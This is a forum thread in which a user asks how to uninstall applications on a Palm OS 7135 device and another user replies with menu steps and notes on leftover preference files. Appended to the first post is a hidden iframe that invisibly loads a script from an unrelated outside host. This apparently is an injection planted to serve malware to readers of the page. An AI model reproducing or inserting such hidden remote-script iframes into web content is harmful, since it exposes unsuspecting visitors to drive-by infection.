    uninstalling or removing applications

    I have looked for this answer in the 7135's manual and a quick scan of this message board. With that said...how do you remove or uninstall an application? Is it as simple as selecting "delete" from the menu and selecting the appropriate icon? Are these applications usually very self-contained? Do you need to worry about remaining related files or drivers?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    This is a basic Palm OS (not 7135 specific) question and nope, you don't usually have to worry about related files, drivers, and preferences being left over if the developer followed all of the rules. It is much like the add/remove function on Windows.

    Occasionally a few things are left so don't be surprised if it does happen. Often a developer will leave something in preferences so that people do not avoid registering software by adding and removing over and over.

    Press => Apps icon (house button)
    Press => Menu icon (below the house)
    Select "Delete" from the menu
    Highlight the application you want to delete and
    Press=> Delete...
    (There are shortcuts but you are a "newbee".)

    Moderators: Shouldn't this be moved to the Palm Discussion section? It really is not unique to the 7135.
